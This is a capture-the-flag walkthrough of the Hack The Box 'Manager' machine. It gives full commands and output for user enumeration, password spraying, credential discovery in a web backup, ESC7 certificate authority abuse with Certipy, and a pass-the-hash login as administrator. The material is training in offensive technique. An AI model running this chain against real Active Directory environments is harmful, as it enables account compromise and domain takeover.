Manager

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Enumeration

Nmap

We’ll use Nmap to scan the remote host and check for any open ports.

ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.134 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.134 -oN nmap_tcp -v

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-09 15:20:59Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after:  2122-07-27T10:31:04
| MD5:   bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
445/tcp   open     microsoft-ds?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after:  2122-07-27T10:31:04
| MD5:   bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ms-sql-info: 
|   10.129.235.134:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-09T15:10:54
| Not valid after:  2055-09-09T15:10:54
| MD5:   d180:ef3e:9a36:78fe:5a0f:44f5:fa37:301d
|_SHA-1: be6e:f7b3:9128:02ad:50df:3e19:5912:a27d:d20b:d273
| ms-sql-ntlm-info: 
|   10.129.235.134:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after:  2122-07-27T10:31:04
| MD5:   bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after:  2122-07-27T10:31:04
| MD5:   bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49667/tcp open     msrpc         Microsoft Windows RPC
49689/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open     msrpc         Microsoft Windows RPC
49695/tcp open     msrpc         Microsoft Windows RPC
49723/tcp open     msrpc         Microsoft Windows RPC
49734/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m50s, deviation: 0s, median: 7h00m50s
| smb2-time: 
|   date: 2025-09-09T15:21:50
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

The Nmap scan shows multiple open ports, including those usually associated with domain controller services, a web server on port 80, an SMB service on port 445, and an SQL server on port 1433.

We also observe that the domain name is manager.htb, so we’ll add this entry to our /etc/hosts file.

echo "10.129.235.134 manager.htb" | sudo tee -a /etc/hosts

HTTP

When we visit port 80 in the browser, we find a static website that appears to have very limited functionality.

SMB

We’ll enumerate the SMB shares with the smbclient tool, attempting to list all available shares through a null session.

└──╼ [★]$ smbclient -L \\\\10.129.235.134 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.235.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The listed SMB shares don’t provide anything useful. However, since null sessions are allowed, we can attempt RID cycling to enumerate users.

RID cycling works by incrementally querying the RID portion of Windows SIDs, which are assigned sequentially to users and groups. This can reveal valid accounts.

To do this, we use the lookupsid module from the Impacket toolkit.

└──╼ [★]$ impacket-lookupsid anonymous@manager.htb -no-pass
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at manager.htb
[*] StringBinding ncacn_np:manager.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
<SNIP>
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)

We extract only the SidTypeUser entries and save them into a file called usernames.txt.

└──╼ [★]$ cat usernames.txt
administrator
zhong
cheng
ryan
raven
jinwoo
chinHae
operator

It is fairly common for users to set their password the same as their username. With that in mind, we’ll try a password spraying attack using the simple username = password pattern.

We can use netexec to attempt SMB authentication against the target.

└──╼ [★]$ nxc smb 10.129.235.134 -u usernames.txt -p usernames.txt --no-bruteforce
SMB         10.129.235.134  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.235.134  445    DC01             [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE 
SMB         10.129.235.134  445    DC01             [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.129.235.134  445    DC01             [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.129.235.134  445    DC01             [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.129.235.134  445    DC01             [-] manager.htb\raven:raven STATUS_LOGON_FAILURE 
SMB         10.129.235.134  445    DC01             [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE 
SMB         10.129.235.134  445    DC01             [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.235.134  445    DC01             [+] manager.htb\operator:operator

We now have the password for operator.

Foothold

We’ll try connecting to the MSSQL Server, as it might provide us with some access to the filesystem. This can be done using the mssqlclient module from the Impacket.

└──╼ [★]$ impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)>

We can use the xp_dirtree to explore the filesystem and list directory contents.

SQL (MANAGER\Operator  guest@master)> xp_dirtree \
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   

Documents and Settings          1      0   

inetpub                         1      0   

PerfLogs                        1      0   

Program Files                   1      0   

Program Files (x86)             1      0   

ProgramData                     1      0   

Recovery                        1      0   

SQL2019                         1      0   

System Volume Information       1      0   

Users                           1      0   

Windows                         1      0

We’ll have a look through the web root at /inetpub/wwwroot to see what’s inside.

SQL (MANAGER\Operator  guest@master)> xp_dirtree \inetpub\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

images                                1      0   

index.html                            1      1   

js                                    1      0   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1

Here we find an intriguing file, website-backup-27-07-23-old.zip, which looks to be a backup of the site. Since it’s stored in the web root, we should be able to download it.

wget http://10.129.235.134/website-backup-27-07-23-old.zip

After extracting the backup, we discover a hidden file named .old-conf.xml.

website-backup-27-07-23-old.zip -d wesite
cd website
ls -la


└──╼ [★]$ ls -la
total 68
drwxr-xr-x 5 knuckl3s knuckl3s  4096 Sep  9 03:51 .
drwxr-xr-x 6 knuckl3s knuckl3s  4096 Sep  9 03:51 ..
-rw-r--r-- 1 knuckl3s knuckl3s  5386 Jul 27  2023 about.html
-rw-r--r-- 1 knuckl3s knuckl3s  5317 Jul 27  2023 contact.html
drwxr-xr-x 2 knuckl3s knuckl3s  4096 Sep  9 03:51 css
drwxr-xr-x 2 knuckl3s knuckl3s  4096 Sep  9 03:51 images
-rw-r--r-- 1 knuckl3s knuckl3s 18203 Jul 27  2023 index.html
drwxr-xr-x 2 knuckl3s knuckl3s  4096 Sep  9 03:51 js
-rw-r--r-- 1 knuckl3s knuckl3s   698 Jul 27  2023 .old-conf.xml
-rw-r--r-- 1 knuckl3s knuckl3s  7900 Jul 27  2023 service.html

The .old-conf.xml file reveals password for the Raven.

└──╼ [★]$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3n<SNIP></password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

We use netexec to spray the credentials and check whether they allow access through WinRM.

└──╼ [★]$ nxc winrm 10.129.235.134 -u raven -p 'R4v3n<SNNIP>'
WINRM       10.129.235.134  5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM       10.129.235.134  5985   DC01             [+] manager.htb\raven:R4v3n<SNIP> (Pwn3d!)

We connect to the target using Evil-WinRM.

└──╼ [★]$ evil-winrm -i 10.129.235.134 -u raven -p 'R4v3n<SNIP>'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>

The user flag is located in Raven’s Desktop:

*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
192a<SNIP>f0dc

Privilege Escalation

We’ll check the Certification Authority for possible misconfigurations and use Certipy to uncover any vulnerabilities. Follow the setup guide to install Certipy. Depending on your environment, you might need to use the command certipy-ad instead of certipy.

└──╼ [★]$ certipy find -u raven -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates

The report shows that the user Raven has risky permissions, specifically ManageCA rights on the Certification Authority. This means we can potentially abuse the ESC7 scenario to escalate privileges to Domain Admin while acting as Raven.

To move forward, we’ll first add Raven as an officer, which will allow us to manage and manually issue certificates.

└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'

Now that we’ve been added as an officer, we can both issue and manage certificates. Using the -enable-template flag, we can enable the SubCA template on the CA.

└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -enable-template subca
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-dc01-ca'

We can view the enabled certificate templates by running the command with the -list-templates flag.

└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -list-templates
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Enabled certificate templates on 'manager-dc01-ca':
    SubCA
    DirectoryEmailReplication
    DomainControllerAuthentication
    KerberosAuthentication
    EFSRecovery
    EFS
    DomainController
    WebServer
    Machine
    User
    Administrator

With the prerequisites in place (having Manage Certificates rights via ManageCA and confirming the SubCA template is enabled) we can now request a certificate using the SubCA template.

Although this request will be denied, it will still generate a request ID and a private key, which we then save to a file.

└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 19
Would you like to save the private key? (y/N) y
[*] Saved private key to 19.key
[-] Failed to request certificate

We see that the certificate request ID is 19. Using our granted permissions, we can now manually issue the previously failed certificate with the ca command and the -issue-request <request ID> parameter.

└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -issue-request 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Got access denied trying to issue certificate

If you encounter [-] Got access denied trying to issue certificate, rerun the command that added Raven as a manager. The cleanup scripts on the box may have reverted the permissions back to their original state.

└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'

└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -issue-request 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

We can fetch the issued certificate using the req command along with the -retrieve <request ID> parameter.

└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -retrieve 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 19
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '19.key'
[*] Saved certificate and private key to 'administrator.pfx'

With the administrator’s PFX file, we can now use it for authentication. However, running the auth command gives the error KRB_AP-ERR_SKEW (Clock skew too great).

This happens when the time on our machine is out of sync with the KDC servers, which breaks Kerberos authentication. To fix it, we need to turn off Automatic Date & Time on our system and manually sync the clock by running the following command:

sudo ntpdate -s manager.htb

Re-running the command now works as expected and successfully dumps the administrator hash.

└──╼ [★]$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3<SNIP>04ee:ae50<SNIP>24ef

We use the administrator’s hash to log in via Evil-WinRM and successfully capture the root flag from the system.

└──╼ [★]$ evil-winrm -i manager.htb -u administrator -H ae50<SNIP>24ef
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
839b<SNIP>4e88

References

https://github.com/ly4k/Certipy
https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#vulnerable-certificate-authority-access-control-esc7
HTB Official Walkthrough for Manager